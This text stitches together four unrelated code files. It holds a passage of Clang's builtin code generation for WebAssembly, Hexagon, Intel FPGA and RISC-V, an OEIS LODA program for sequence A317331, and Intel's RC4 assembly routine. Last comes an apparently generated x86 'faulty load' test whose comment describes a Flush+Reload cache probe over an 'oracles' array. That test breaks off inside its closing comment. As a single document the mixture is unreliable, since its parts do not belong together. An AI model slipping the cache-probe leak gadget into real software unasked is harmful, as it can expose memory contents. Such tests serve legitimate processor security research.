case WebAssembly::BI__builtin_wasm_fma_f32x4:
case WebAssembly::BI__builtin_wasm_fms_f32x4:
case WebAssembly::BI__builtin_wasm_fma_f64x2:
case WebAssembly::BI__builtin_wasm_fms_f64x2: {
Value *A = EmitScalarExpr(E->getArg(0));
Value *B = EmitScalarExpr(E->getArg(1));
Value *C = EmitScalarExpr(E->getArg(2));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_fma_f32x4:
case WebAssembly::BI__builtin_wasm_fma_f64x2:
IntNo = Intrinsic::wasm_fma;
break;
case WebAssembly::BI__builtin_wasm_fms_f32x4:
case WebAssembly::BI__builtin_wasm_fms_f64x2:
IntNo = Intrinsic::wasm_fms;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo, A->getType());
return Builder.CreateCall(Callee, {A, B, C});
}
case WebAssembly::BI__builtin_wasm_laneselect_i8x16:
case WebAssembly::BI__builtin_wasm_laneselect_i16x8:
case WebAssembly::BI__builtin_wasm_laneselect_i32x4:
case WebAssembly::BI__builtin_wasm_laneselect_i64x2: {
Value *A = EmitScalarExpr(E->getArg(0));
Value *B = EmitScalarExpr(E->getArg(1));
Value *C = EmitScalarExpr(E->getArg(2));
Function *Callee =
CGM.getIntrinsic(Intrinsic::wasm_laneselect, A->getType());
return Builder.CreateCall(Callee, {A, B, C});
}
case WebAssembly::BI__builtin_wasm_relaxed_swizzle_i8x16: {
Value *Src = EmitScalarExpr(E->getArg(0));
Value *Indices = EmitScalarExpr(E->getArg(1));
Function *Callee = CGM.getIntrinsic(Intrinsic::wasm_relaxed_swizzle);
return Builder.CreateCall(Callee, {Src, Indices});
}
case WebAssembly::BI__builtin_wasm_relaxed_min_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_max_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_min_f64x2:
case WebAssembly::BI__builtin_wasm_relaxed_max_f64x2: {
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_relaxed_min_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_min_f64x2:
IntNo = Intrinsic::wasm_relaxed_min;
break;
case WebAssembly::BI__builtin_wasm_relaxed_max_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_max_f64x2:
IntNo = Intrinsic::wasm_relaxed_max;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo, LHS->getType());
return Builder.CreateCall(Callee, {LHS, RHS});
}
case WebAssembly::BI__builtin_wasm_relaxed_trunc_s_i32x4_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_trunc_u_i32x4_f32x4:
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_s_i32x4_f64x2:
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_u_i32x4_f64x2: {
Value *Vec = EmitScalarExpr(E->getArg(0));
unsigned IntNo;
switch (BuiltinID) {
case WebAssembly::BI__builtin_wasm_relaxed_trunc_s_i32x4_f32x4:
IntNo = Intrinsic::wasm_relaxed_trunc_signed;
break;
case WebAssembly::BI__builtin_wasm_relaxed_trunc_u_i32x4_f32x4:
IntNo = Intrinsic::wasm_relaxed_trunc_unsigned;
break;
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_s_i32x4_f64x2:
IntNo = Intrinsic::wasm_relaxed_trunc_zero_signed;
break;
case WebAssembly::BI__builtin_wasm_relaxed_trunc_zero_u_i32x4_f64x2:
IntNo = Intrinsic::wasm_relaxed_trunc_zero_unsigned;
break;
default:
llvm_unreachable("unexpected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo);
return Builder.CreateCall(Callee, {Vec});
}
default:
return nullptr;
}
}
static std::pair<Intrinsic::ID, unsigned>
getIntrinsicForHexagonNonGCCBuiltin(unsigned BuiltinID) {
struct Info {
unsigned BuiltinID;
Intrinsic::ID IntrinsicID;
unsigned VecLen;
};
Info Infos[] = {
#define CUSTOM_BUILTIN_MAPPING(x,s) \
{ Hexagon::BI__builtin_HEXAGON_##x, Intrinsic::hexagon_##x, s },
CUSTOM_BUILTIN_MAPPING(L2_loadrub_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrb_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadruh_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrh_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadri_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrd_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrub_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrb_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadruh_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrh_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadri_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrd_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerb_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerh_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerf_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storeri_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerd_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerb_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerh_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerf_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storeri_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerd_pcr, 0)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstoreq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorenq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentnq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstoreq_128B, 128)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorenq_128B, 128)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentq_128B, 128)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentnq_128B, 128)
#include "clang/Basic/BuiltinsHexagonMapCustomDep.def"
#undef CUSTOM_BUILTIN_MAPPING
};
auto CmpInfo = [] (Info A, Info B) { return A.BuiltinID < B.BuiltinID; };
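// Sort the table exactly once: the comma expression runs llvm::sort during
// the thread-safe initialization of this function-local static.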
static const bool SortOnce = (llvm::sort(Infos, CmpInfo), true);
(void)SortOnce;
const Info *F = std::lower_bound(std::begin(Infos), std::end(Infos),
Info{BuiltinID, 0, 0}, CmpInfo);
if (F == std::end(Infos) || F->BuiltinID != BuiltinID)
return {Intrinsic::not_intrinsic, 0};
return {F->IntrinsicID, F->VecLen};
}
Value *CodeGenFunction::EmitHexagonBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
Intrinsic::ID ID;
unsigned VecLen;
std::tie(ID, VecLen) = getIntrinsicForHexagonNonGCCBuiltin(BuiltinID);
auto MakeCircOp = [this, E](unsigned IntID, bool IsLoad) {
// The base pointer is passed by address, so it needs to be loaded.
Address A = EmitPointerWithAlignment(E->getArg(0));
Address BP = Address(
Builder.CreateBitCast(A.getPointer(), Int8PtrPtrTy), A.getAlignment());
llvm::Value *Base = Builder.CreateLoad(BP);
// The treatment of both loads and stores is the same: the arguments for
// the builtin are the same as the arguments for the intrinsic.
// Load:
// builtin(Base, Inc, Mod, Start) -> intr(Base, Inc, Mod, Start)
// builtin(Base, Mod, Start) -> intr(Base, Mod, Start)
// Store:
// builtin(Base, Inc, Mod, Val, Start) -> intr(Base, Inc, Mod, Val, Start)
// builtin(Base, Mod, Val, Start) -> intr(Base, Mod, Val, Start)
SmallVector<llvm::Value*,5> Ops = { Base };
for (unsigned i = 1, e = E->getNumArgs(); i != e; ++i)
Ops.push_back(EmitScalarExpr(E->getArg(i)));
llvm::Value *Result = Builder.CreateCall(CGM.getIntrinsic(IntID), Ops);
// The load intrinsics generate two results (Value, NewBase), stores
// generate one (NewBase). The new base address needs to be stored.
llvm::Value *NewBase = IsLoad ? Builder.CreateExtractValue(Result, 1)
: Result;
llvm::Value *LV = Builder.CreateBitCast(
EmitScalarExpr(E->getArg(0)), NewBase->getType()->getPointerTo());
Address Dest = EmitPointerWithAlignment(E->getArg(0));
llvm::Value *RetVal =
Builder.CreateAlignedStore(NewBase, LV, Dest.getAlignment());
if (IsLoad)
RetVal = Builder.CreateExtractValue(Result, 0);
return RetVal;
};
// Handle the conversion of bit-reverse load builtins to LLVM IR.
// The intrinsic call emitted by this function only reads from memory; the
// write to memory is handled by the store instruction.
auto MakeBrevLd = [this, E](unsigned IntID, llvm::Type *DestTy) {
// The intrinsic returns a pair: the updated base pointer, which is what
// this function returns, and the loaded value. The destination for the
// loaded value is passed by address, so the value needs to be stored.
llvm::Value *BaseAddress =
Builder.CreateBitCast(EmitScalarExpr(E->getArg(0)), Int8PtrTy);
// Expressions like &(*pt++) will be incremented per evaluation.
// EmitPointerWithAlignment and EmitScalarExpr evaluates the expression
// per call.
Address DestAddr = EmitPointerWithAlignment(E->getArg(1));
DestAddr = Address(Builder.CreateBitCast(DestAddr.getPointer(), Int8PtrTy),
DestAddr.getAlignment());
llvm::Value *DestAddress = DestAddr.getPointer();
// Operands are Base, Dest, Modifier.
// The intrinsic format in LLVM IR is defined as
// { ValueType, i8* } (i8*, i32).
llvm::Value *Result = Builder.CreateCall(
CGM.getIntrinsic(IntID), {BaseAddress, EmitScalarExpr(E->getArg(2))});
// The value needs to be stored as the variable is passed by reference.
llvm::Value *DestVal = Builder.CreateExtractValue(Result, 0);
// The store needs to be truncated to fit the destination type.
// While i32 and i64 are natively supported on Hexagon, i8 and i16 need
// to be handled with stores of the respective destination type.
DestVal = Builder.CreateTrunc(DestVal, DestTy);
llvm::Value *DestForStore =
Builder.CreateBitCast(DestAddress, DestVal->getType()->getPointerTo());
Builder.CreateAlignedStore(DestVal, DestForStore, DestAddr.getAlignment());
// The updated value of the base pointer is returned.
return Builder.CreateExtractValue(Result, 1);
};
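// HVX predicate registers are modeled as plain vectors on the C side but as
// vector-predicate values in LLVM IR; V2Q and Q2V convert between the two
// with vandvrt/vandqrt and an all-ones mask.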
auto V2Q = [this, VecLen] (llvm::Value *Vec) {
Intrinsic::ID ID = VecLen == 128 ? Intrinsic::hexagon_V6_vandvrt_128B
: Intrinsic::hexagon_V6_vandvrt;
return Builder.CreateCall(CGM.getIntrinsic(ID),
{Vec, Builder.getInt32(-1)});
};
auto Q2V = [this, VecLen] (llvm::Value *Pred) {
Intrinsic::ID ID = VecLen == 128 ? Intrinsic::hexagon_V6_vandqrt_128B
: Intrinsic::hexagon_V6_vandqrt;
return Builder.CreateCall(CGM.getIntrinsic(ID),
{Pred, Builder.getInt32(-1)});
};
switch (BuiltinID) {
// These intrinsics return a tuple {Vector, VectorPred} in LLVM IR,
// and the corresponding C/C++ builtins use loads/stores to update
// the predicate.
case Hexagon::BI__builtin_HEXAGON_V6_vaddcarry:
case Hexagon::BI__builtin_HEXAGON_V6_vaddcarry_128B:
case Hexagon::BI__builtin_HEXAGON_V6_vsubcarry:
case Hexagon::BI__builtin_HEXAGON_V6_vsubcarry_128B: {
// Get the type from the 0-th argument.
llvm::Type *VecType = ConvertType(E->getArg(0)->getType());
Address PredAddr = Builder.CreateBitCast(
EmitPointerWithAlignment(E->getArg(2)), VecType->getPointerTo(0));
llvm::Value *PredIn = V2Q(Builder.CreateLoad(PredAddr));
llvm::Value *Result = Builder.CreateCall(CGM.getIntrinsic(ID),
{EmitScalarExpr(E->getArg(0)), EmitScalarExpr(E->getArg(1)), PredIn});
llvm::Value *PredOut = Builder.CreateExtractValue(Result, 1);
Builder.CreateAlignedStore(Q2V(PredOut), PredAddr.getPointer(),
PredAddr.getAlignment());
return Builder.CreateExtractValue(Result, 0);
}
case Hexagon::BI__builtin_HEXAGON_L2_loadrub_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrb_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadruh_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrh_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadri_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrd_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrub_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadrb_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadruh_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadrh_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadri_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadrd_pcr:
return MakeCircOp(ID, /*IsLoad=*/true);
case Hexagon::BI__builtin_HEXAGON_S2_storerb_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerh_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerf_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storeri_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerd_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerb_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storerh_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storerf_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storeri_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storerd_pcr:
return MakeCircOp(ID, /*IsLoad=*/false);
case Hexagon::BI__builtin_brev_ldub:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrub_pbr, Int8Ty);
case Hexagon::BI__builtin_brev_ldb:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrb_pbr, Int8Ty);
case Hexagon::BI__builtin_brev_lduh:
return MakeBrevLd(Intrinsic::hexagon_L2_loadruh_pbr, Int16Ty);
case Hexagon::BI__builtin_brev_ldh:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrh_pbr, Int16Ty);
case Hexagon::BI__builtin_brev_ldw:
return MakeBrevLd(Intrinsic::hexagon_L2_loadri_pbr, Int32Ty);
case Hexagon::BI__builtin_brev_ldd:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrd_pbr, Int64Ty);
default: {
if (ID == Intrinsic::not_intrinsic)
return nullptr;
auto IsVectorPredTy = [](llvm::Type *T) {
return T->isVectorTy() &&
cast<llvm::VectorType>(T)->getElementType()->isIntegerTy(1);
};
llvm::Function *IntrFn = CGM.getIntrinsic(ID);
llvm::FunctionType *IntrTy = IntrFn->getFunctionType();
SmallVector<llvm::Value*,4> Ops;
for (unsigned i = 0, e = IntrTy->getNumParams(); i != e; ++i) {
llvm::Type *T = IntrTy->getParamType(i);
const Expr *A = E->getArg(i);
if (IsVectorPredTy(T)) {
// There will be an implicit cast to a boolean vector. Strip it.
if (auto *Cast = dyn_cast<ImplicitCastExpr>(A)) {
if (Cast->getCastKind() == CK_BitCast)
A = Cast->getSubExpr();
}
Ops.push_back(V2Q(EmitScalarExpr(A)));
} else {
Ops.push_back(EmitScalarExpr(A));
}
}
llvm::Value *Call = Builder.CreateCall(IntrFn, Ops);
if (IsVectorPredTy(IntrTy->getReturnType()))
Call = Q2V(Call);
return Call;
} // default
} // switch
return nullptr;
}
RValue CodeGenFunction::EmitIntelFPGARegBuiltin(const CallExpr *E,
ReturnValueSlot ReturnValue) {
const Expr *PtrArg = E->getArg(0);
QualType ArgType = PtrArg->getType();
StringRef AnnotStr = "__builtin_intel_fpga_reg";
if (ArgType->isRecordType()) {
Address DstAddr = ReturnValue.getValue();
EmitAnyExprToMem(PtrArg, DstAddr, ArgType.getQualifiers(), true);
Address A =
EmitIntelFPGAFieldAnnotations(E->getExprLoc(), DstAddr, AnnotStr);
return RValue::getAggregate(A);
}
// if scalar type
llvm::Value *V = EmitScalarExpr(PtrArg);
// llvm.annotation does not accept anything but integer types.
llvm::Type *OrigVType = V->getType();
if (!OrigVType->isIntegerTy()) {
IntegerType *IntTy =
Builder.getIntNTy(CGM.getDataLayout().getTypeSizeInBits(OrigVType));
V = Builder.CreateBitOrPointerCast(V, IntTy);
}
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::annotation,
V->getType());
llvm::Value *AnnotatedV =
EmitAnnotationCall(F, V, AnnotStr, E->getExprLoc());
if (AnnotatedV->getType() != OrigVType) {
AnnotatedV = Builder.CreateBitOrPointerCast(AnnotatedV, OrigVType);
}
return RValue::get(AnnotatedV);
}
RValue CodeGenFunction::EmitIntelFPGAMemBuiltin(const CallExpr *E) {
// Arguments
const Expr *PtrArg = E->getArg(0);
Value *PtrVal = EmitScalarExpr(PtrArg);
// Create the pointer annotation
Function *F =
CGM.getIntrinsic(llvm::Intrinsic::ptr_annotation, PtrVal->getType());
SmallString<256> AnnotStr;
llvm::raw_svector_ostream Out(AnnotStr);
Optional<llvm::APSInt> Params =
E->getArg(1)->getIntegerConstantExpr(getContext());
assert(Params.hasValue() && "Constant arg isn't actually constant?");
Out << "{params:" << toString(*Params, 10) << "}";
Optional<llvm::APSInt> CacheSize =
E->getArg(2)->getIntegerConstantExpr(getContext());
assert(CacheSize.hasValue() && "Constant arg isn't actually constant?");
Out << "{cache-size:" << toString(*CacheSize, 10) << "}";
llvm::Value *Ann = EmitAnnotationCall(F, PtrVal, AnnotStr, SourceLocation());
cast<CallBase>(Ann)->addFnAttr(llvm::Attribute::ReadNone);
return RValue::get(Ann);
}
Value *CodeGenFunction::EmitRISCVBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue) {
SmallVector<Value *, 4> Ops;
llvm::Type *ResultType = ConvertType(E->getType());
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++)
Ops.push_back(EmitScalarExpr(E->getArg(i)));
Intrinsic::ID ID = Intrinsic::not_intrinsic;
unsigned NF = 1;
constexpr unsigned TAIL_UNDISTURBED = 0;
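// NF and TAIL_UNDISTURBED are consumed by the generated vector-builtin
// code included at the bottom of this switch.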
// Required for overloaded intrinsics.
llvm::SmallVector<llvm::Type *, 2> IntrinsicTypes;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin ID");
case RISCV::BI__builtin_riscv_orc_b_32:
case RISCV::BI__builtin_riscv_orc_b_64:
case RISCV::BI__builtin_riscv_clmul:
case RISCV::BI__builtin_riscv_clmulh:
case RISCV::BI__builtin_riscv_clmulr:
case RISCV::BI__builtin_riscv_bcompress_32:
case RISCV::BI__builtin_riscv_bcompress_64:
case RISCV::BI__builtin_riscv_bdecompress_32:
case RISCV::BI__builtin_riscv_bdecompress_64:
case RISCV::BI__builtin_riscv_grev_32:
case RISCV::BI__builtin_riscv_grev_64:
case RISCV::BI__builtin_riscv_gorc_32:
case RISCV::BI__builtin_riscv_gorc_64:
case RISCV::BI__builtin_riscv_shfl_32:
case RISCV::BI__builtin_riscv_shfl_64:
case RISCV::BI__builtin_riscv_unshfl_32:
case RISCV::BI__builtin_riscv_unshfl_64:
case RISCV::BI__builtin_riscv_xperm_n:
case RISCV::BI__builtin_riscv_xperm_b:
case RISCV::BI__builtin_riscv_xperm_h:
case RISCV::BI__builtin_riscv_xperm_w:
case RISCV::BI__builtin_riscv_crc32_b:
case RISCV::BI__builtin_riscv_crc32_h:
case RISCV::BI__builtin_riscv_crc32_w:
case RISCV::BI__builtin_riscv_crc32_d:
case RISCV::BI__builtin_riscv_crc32c_b:
case RISCV::BI__builtin_riscv_crc32c_h:
case RISCV::BI__builtin_riscv_crc32c_w:
case RISCV::BI__builtin_riscv_crc32c_d: {
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin ID");
// Zbb
case RISCV::BI__builtin_riscv_orc_b_32:
case RISCV::BI__builtin_riscv_orc_b_64:
ID = Intrinsic::riscv_orc_b;
break;
// Zbc
case RISCV::BI__builtin_riscv_clmul:
ID = Intrinsic::riscv_clmul;
break;
case RISCV::BI__builtin_riscv_clmulh:
ID = Intrinsic::riscv_clmulh;
break;
case RISCV::BI__builtin_riscv_clmulr:
ID = Intrinsic::riscv_clmulr;
break;
// Zbe
case RISCV::BI__builtin_riscv_bcompress_32:
case RISCV::BI__builtin_riscv_bcompress_64:
ID = Intrinsic::riscv_bcompress;
break;
case RISCV::BI__builtin_riscv_bdecompress_32:
case RISCV::BI__builtin_riscv_bdecompress_64:
ID = Intrinsic::riscv_bdecompress;
break;
// Zbp
case RISCV::BI__builtin_riscv_grev_32:
case RISCV::BI__builtin_riscv_grev_64:
ID = Intrinsic::riscv_grev;
break;
case RISCV::BI__builtin_riscv_gorc_32:
case RISCV::BI__builtin_riscv_gorc_64:
ID = Intrinsic::riscv_gorc;
break;
case RISCV::BI__builtin_riscv_shfl_32:
case RISCV::BI__builtin_riscv_shfl_64:
ID = Intrinsic::riscv_shfl;
break;
case RISCV::BI__builtin_riscv_unshfl_32:
case RISCV::BI__builtin_riscv_unshfl_64:
ID = Intrinsic::riscv_unshfl;
break;
case RISCV::BI__builtin_riscv_xperm_n:
ID = Intrinsic::riscv_xperm_n;
break;
case RISCV::BI__builtin_riscv_xperm_b:
ID = Intrinsic::riscv_xperm_b;
break;
case RISCV::BI__builtin_riscv_xperm_h:
ID = Intrinsic::riscv_xperm_h;
break;
case RISCV::BI__builtin_riscv_xperm_w:
ID = Intrinsic::riscv_xperm_w;
break;
// Zbr
case RISCV::BI__builtin_riscv_crc32_b:
ID = Intrinsic::riscv_crc32_b;
break;
case RISCV::BI__builtin_riscv_crc32_h:
ID = Intrinsic::riscv_crc32_h;
break;
case RISCV::BI__builtin_riscv_crc32_w:
ID = Intrinsic::riscv_crc32_w;
break;
case RISCV::BI__builtin_riscv_crc32_d:
ID = Intrinsic::riscv_crc32_d;
break;
case RISCV::BI__builtin_riscv_crc32c_b:
ID = Intrinsic::riscv_crc32c_b;
break;
case RISCV::BI__builtin_riscv_crc32c_h:
ID = Intrinsic::riscv_crc32c_h;
break;
case RISCV::BI__builtin_riscv_crc32c_w:
ID = Intrinsic::riscv_crc32c_w;
break;
case RISCV::BI__builtin_riscv_crc32c_d:
ID = Intrinsic::riscv_crc32c_d;
break;
}
IntrinsicTypes = {ResultType};
break;
}
// Vector builtins are handled from here.
#include "clang/Basic/riscv_vector_builtin_cg.inc"
}
assert(ID != Intrinsic::not_intrinsic);
llvm::Function *F = CGM.getIntrinsic(ID, IntrinsicTypes);
return Builder.CreateCall(F, Ops, "");
}
|
; A317331: Indices m for which A058304(m) = 1.
; 4,8,11,16,20,23,27,32,36,40,43,47,52,55,59,64,68,72,75,80,84,87,91,95,100,104,107,111,116,119,123,128,132,136,139,144,148,151,155,160,164,168,171,175,180,183,187,191,196,200,203,208,212,215,219,223,228,232,235,239,244,247,251,256,260,264,267,272,276,279,283,288,292,296,299,303,308,311,315,320,324,328,331,336,340,343,347,351,356,360,363,367,372,375,379,383,388,392,395,400,404,407,411,416,420,424,427,431,436,439,443,447,452,456,459,464,468,471,475,479,484,488,491,495,500,503,507,512,516,520,523,528,532,535,539,544,548,552,555,559,564,567,571,576,580,584,587,592,596,599,603,607,612,616,619,623,628,631,635,640,644,648,651,656,660,663,667,672,676,680,683,687,692,695,699,703,708,712,715,720,724,727,731,735,740,744,747,751,756,759,763,767,772,776,779,784,788,791,795,800,804,808,811,815,820,823,827,832,836,840,843,848,852,855,859,863,868,872,875,879,884,887,891,895,900,904,907,912,916,919,923,928,932,936,939,943,948,951,955,959,964,968,971,976,980,983,987,991,996,1000
mov $6,$0
mul $0,2
mov $2,$0
mov $4,1
lpb $2
mov $0,2
div $2,2
add $2,1
lpb $4
trn $4,$2
add $5,1
lpe
mov $4,$2
mod $4,$0
lpb $5
mov $2,1
mov $5,1
lpe
sub $2,1
lpe
add $4,5
mov $1,$4
sub $1,2
mov $3,$6
mul $3,4
add $1,$3
|
###############################################################################
# Copyright 2018 Intel Corporation
# All Rights Reserved.
#
# If this software was obtained under the Intel Simplified Software License,
# the following terms apply:
#
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors. The
# Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions. No part of the Material may be used, copied, reproduced,
# modified, published, uploaded, posted, transmitted, distributed or disclosed
# in any way without Intel's prior express written permission. No license under
# any patent, copyright or other intellectual property rights in the Material
# is granted to or conferred upon you, either expressly, by implication,
# inducement, estoppel or otherwise. Any license under such intellectual
# property rights must be express and approved by Intel in writing.
#
# Unless otherwise agreed by Intel in writing, you may not remove or alter this
# notice or any other notice embedded in Materials by Intel or Intel's
# suppliers or licensors in any way.
#
#
# If this software was obtained under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
.section .note.GNU-stack,"",%progbits
.text
.p2align 4, 0x90
.globl m7_ARCFourProcessData
.type m7_ARCFourProcessData, @function
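# Hedged reading of the routine below: it implements the RC4/ARCFour PRGA
# with the SysV arguments src=%rdi, dst=%rsi, len=%edx, context=%rcx; the
# context appears to hold i at offset 4, j at offset 8 and a 256-entry
# 32-bit S-box from offset 12. Each iteration advances i, adds S[i] to j,
# swaps S[i] and S[j], and XORs the keystream byte S[(S[i]+S[j]) & 0xff]
# into the data stream.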
m7_ARCFourProcessData:
push %rbx
push %rbp
movslq %edx, %r8
test %r8, %r8
mov %rcx, %rbp
jz .Lquitgas_1
movzbq (4)(%rbp), %rax
movzbq (8)(%rbp), %rbx
lea (12)(%rbp), %rbp
add $(1), %rax
movzbq %al, %rax
movzbq (%rbp,%rax,4), %rcx
.p2align 4, 0x90
.Lmain_loopgas_1:
add %rcx, %rbx
movzbq %bl, %rbx
add $(1), %rdi
add $(1), %rsi
movzbq (%rbp,%rbx,4), %rdx
movl %ecx, (%rbp,%rbx,4)
add %rdx, %rcx
movzbq %cl, %rcx
movl %edx, (%rbp,%rax,4)
movb (%rbp,%rcx,4), %dl
add $(1), %rax
movzbq %al, %rax
xorb (-1)(%rdi), %dl
sub $(1), %r8
movzbq (%rbp,%rax,4), %rcx
movb %dl, (-1)(%rsi)
jne .Lmain_loopgas_1
lea (-12)(%rbp), %rbp
sub $(1), %rax
movzbq %al, %rax
movl %eax, (4)(%rbp)
movl %ebx, (8)(%rbp)
.Lquitgas_1:
pop %rbp
pop %rbx
ret
.Lfe1:
.size m7_ARCFourProcessData, .Lfe1-(m7_ARCFourProcessData)
|
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r13
push %r14
push %r15
push %r9
push %rdi
lea addresses_WC_ht+0x1e31d, %rdi
nop
nop
nop
add $54954, %r9
vmovups (%rdi), %ymm3
vextracti128 $0, %ymm3, %xmm3
vpextrq $1, %xmm3, %r12
cmp $36469, %r15
lea addresses_WC_ht+0x11eeb, %r11
nop
nop
nop
nop
lfence
movb (%r11), %r13b
nop
nop
nop
sub %r12, %r12
lea addresses_WC_ht+0x1773b, %r12
clflush (%r12)
nop
nop
nop
xor %r14, %r14
movb (%r12), %r13b
nop
nop
nop
sub $49510, %r14
lea addresses_normal_ht+0x14a3b, %r9
nop
nop
and $4537, %r11
movl $0x61626364, (%r9)
nop
nop
sub $62081, %r12
lea addresses_normal_ht+0x1953b, %r11
nop
nop
nop
and $19196, %r13
movups (%r11), %xmm4
vpextrq $1, %xmm4, %r15
nop
nop
nop
xor %r11, %r11
pop %rdi
pop %r9
pop %r15
pop %r14
pop %r13
pop %r12
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r14
push %r8
push %rax
push %rbp
push %rcx
push %rdi
// Store
lea addresses_UC+0xe09b, %rdi
nop
nop
nop
nop
nop
cmp $20142, %rbp
movb $0x51, (%rdi)
nop
nop
nop
nop
and %rcx, %rcx
// Store
lea addresses_D+0x1b061, %rdi
clflush (%rdi)
sub %r14, %r14
mov $0x5152535455565758, %r8
movq %r8, (%rdi)
sub $7030, %rax
// Store
lea addresses_UC+0x13f0b, %r14
clflush (%r14)
nop
nop
nop
add %r11, %r11
movb $0x51, (%r14)
and $34024, %r8
// Faulty Load
lea addresses_US+0x15f3b, %r14
and $12538, %rcx
movaps (%r14), %xmm7
vpextrq $1, %xmm7, %rdi
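// Hedged note: the low byte of the value extracted into %rdi selects a
// 4096-byte-strided slot of the `oracles` array (shl $12 multiplies by the
// page size), so a later cache-timing scan over `oracles` can recover the
// leaked byte - the usual Flush+Reload probe in these generated
// transient-execution tests.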
lea oracles, %r14
and $0xff, %rdi
shlq $12, %rdi
mov (%r14,%rdi,1), %rdi
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r8
pop %r14
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 5, 'NT': False, 'type': 'addresses_UC', 'size': 1, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_D', 'size': 8, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 4, 'NT': False, 'type': 'addresses_UC', 'size': 1, 'AVXalign': False}}
[Faulty Load]
